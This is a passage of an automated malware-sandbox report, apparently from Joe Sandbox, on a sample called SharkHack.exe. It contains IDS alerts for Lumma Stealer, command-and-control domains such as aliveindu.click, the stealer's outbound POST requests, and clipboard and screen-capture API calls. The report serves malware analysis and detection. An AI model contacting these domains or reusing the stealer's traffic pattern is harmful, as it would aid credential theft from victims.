                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2DFE5A91h10_2_0043FE20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov word ptr [ecx], bp10_2_0041CECA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx]10_2_0043E6E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+000000C8h]10_2_0040C6F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov byte ptr [edi], bl10_2_00408EF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov byte ptr [edi], al10_2_0042BE8A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]10_2_0042BE8A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov byte ptr [ebp+00h], al10_2_0041DE90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov word ptr [ebx], cx10_2_00418740
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov word ptr [edi], dx10_2_00414777
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov byte ptr [esi], al10_2_0041BFCA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]10_2_004237D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+5F376B7Fh]10_2_00417FE1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+000002E8h]10_2_00417FE1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov byte ptr [esi], al10_2_00416F8D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov edx, ecx10_2_00416F8D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov word ptr [esi], cx10_2_00416F8D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov eax, dword ptr [esp+20h]10_2_00424F91
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h10_2_00424F91
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax]10_2_0043DFB3

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50014 -> 104.21.64.143:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50014 -> 104.21.64.143:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50013 -> 104.21.64.143:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50013 -> 104.21.64.143:443
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: abruptyopsn.shop
                          Source: Malware configuration extractorURLs: cloudewahsj.shop
                          Source: Malware configuration extractorURLs: wholersorie.shop
                          Source: Malware configuration extractorURLs: nearycrepso.shop
                          Source: Malware configuration extractorURLs: noisycuttej.shop
                          Source: Malware configuration extractorURLs: aliveindu.click
                          Source: Malware configuration extractorURLs: rabidcowse.shop
                          Source: Malware configuration extractorURLs: framekgirus.shop
                          Source: Malware configuration extractorURLs: tirepublicerj.shop
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50014 -> 104.21.64.143:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50013 -> 104.21.64.143:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50015 -> 104.21.64.143:443
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aliveindu.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: aliveindu.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9WGSI9MA6J92User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18126Host: aliveindu.click
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficDNS traffic detected: DNS query: aliveindu.click
                          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aliveindu.click
                          Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                          Source: SharkHack.exe, 00000000.00000002.2885694710.00000000080B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                          Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.2925272325.0000000001464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aliveindu.click/
                          Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aliveindu.click/6(
                          Source: AddInProcess32.exe, 0000000A.00000002.2925272325.00000000014FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aliveindu.click/api
                          Source: AddInProcess32.exe, 0000000A.00000002.2925272325.00000000014FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aliveindu.click:443/api
                          Source: SharkHack.exeString found in binary or memory: https://api.quotable.io/random?tags=love
                          Source: AddInProcess32.exe, 0000000A.00000002.2928100351.0000000003967000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                          Source: AddInProcess32.exe, 0000000A.00000002.2928100351.0000000003967000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                          Source: unknownHTTPS traffic detected: 104.21.64.143:443 -> 192.168.2.4:50013 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.64.143:443 -> 192.168.2.4:50014 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.64.143:443 -> 192.168.2.4:50015 version: TLS 1.2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00432D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,10_2_00432D70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00432D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,10_2_00432D70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00432FE0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,10_2_00432FE0
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess Stats: CPU usage > 49%
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089CFC40 CreateProcessAsUserW,0_2_089CFC40
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_01F970090_2_01F97009
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_01F976300_2_01F97630
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_01F9C0B80_2_01F9C0B8
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_059D00400_2_059D0040
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_059D03480_2_059D0348
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_059D45C80_2_059D45C8
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_059D00060_2_059D0006
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_059D03380_2_059D0338
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_059D42B00_2_059D42B0
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_059D09D00_2_059D09D0
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_059D09E00_2_059D09E0
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_059D5AD80_2_059D5AD8
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08744D400_2_08744D40
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_087403F10_2_087403F1
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_087404000_2_08740400
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C18D80_2_089C18D8
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C58080_2_089C5808
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C10500_2_089C1050
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C00400_2_089C0040
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C31400_2_089C3140
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089CAEB00_2_089CAEB0
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C22A00_2_089C22A0
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C8B380_2_089C8B38
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089CEB400_2_089CEB40
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089CA3700_2_089CA370
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C30DE0_2_089C30DE
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C18C80_2_089C18C8
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C40180_2_089C4018
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C94300_2_089C9430
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C002F0_2_089C002F
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C102F0_2_089C102F
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C40280_2_089C4028
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089CDD980_2_089CDD98
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C51B00_2_089C51B0
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C51A00_2_089C51A0
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089CE5000_2_089CE500
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C22900_2_089C2290
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C4E080_2_089C4E08
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C4E000_2_089C4E00
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C56510_2_089C5651
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C56600_2_089C5660
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C63B80_2_089C63B8
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089CCBA00_2_089CCBA0
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C53D90_2_089C53D9
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C57F80_2_089C57F8
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C53E80_2_089C53E8
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C4B080_2_089C4B08
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C63080_2_089C6308
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C4B000_2_089C4B00
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C8B290_2_089C8B29
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C9B500_2_089C9B50
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08A0E9C80_2_08A0E9C8
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08A0AD500_2_08A0AD50
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08A02AC80_2_08A02AC8
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08A06B880_2_08A06B88
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08A0E9C10_2_08A0E9C1
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08A02AC60_2_08A02AC6
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08EF47E00_2_08EF47E0
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08EF00400_2_08EF0040
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08744D2B0_2_08744D2B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_031D8E887_2_031D8E88
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_031D6EE87_2_031D6EE8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B737707_2_07B73770
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B7E5307_2_07B7E530
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B785707_2_07B78570
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B76AA07_2_07B76AA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B702087_2_07B70208
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B791497_2_07B79149
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B710817_2_07B71081
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B71F907_2_07B71F90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B71F807_2_07B71F80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B7AF107_2_07B7AF10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B737627_2_07B73762
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B735B87_2_07B735B8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B735C87_2_07B735C8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B72D627_2_07B72D62
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B785607_2_07B78560
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B743207_2_07B74320
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B743127_2_07B74312
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B733507_2_07B73350
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B733407_2_07B73340
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B77AB87_2_07B77AB8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B77AA47_2_07B77AA4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B76A907_2_07B76A90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B72A707_2_07B72A70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B72A607_2_07B72A60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B701F97_2_07B701F9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B731187_2_07B73118
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B7C1087_2_07B7C108
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B731087_2_07B73108
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07B7C8707_2_07B7C870
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07BA3B987_2_07BA3B98
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07BAEF307_2_07BAEF30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07BAD2787_2_07BAD278
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07BA95607_2_07BA9560
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07BA3AE47_2_07BA3AE4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07F931587_2_07F93158
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07F920C87_2_07F920C8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_080148B87_2_080148B8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0801E8307_2_0801E830
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_080148A87_2_080148A8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_084246807_2_08424680
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_084246707_2_08424670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_084202E07_2_084202E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_085E4D407_2_085E4D40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_085E04007_2_085E0400
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_085E03C87_2_085E03C8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_085E03F17_2_085E03F1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_085E4D2B7_2_085E4D2B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_03030D209_2_03030D20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_03030D129_2_03030D12
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_030388489_2_03038848
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040864010_2_00408640
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042904010_2_00429040
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043804010_2_00438040
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042A05010_2_0042A050
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042585010_2_00425850
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042106010_2_00421060
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043886010_2_00438860
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042600010_2_00426000
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043280010_2_00432800
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041982010_2_00419820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043F0CB10_2_0043F0CB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004038D010_2_004038D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004058E010_2_004058E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004308E010_2_004308E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004088F010_2_004088F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040D0FF10_2_0040D0FF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041588210_2_00415882
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040A8A010_2_0040A8A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004390A010_2_004390A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040914010_2_00409140
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041D94010_2_0041D940
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041614810_2_00416148
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040616010_2_00406160
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043396010_2_00433960
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042F16610_2_0042F166
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041596610_2_00415966
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042497410_2_00424974
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0044013010_2_00440130
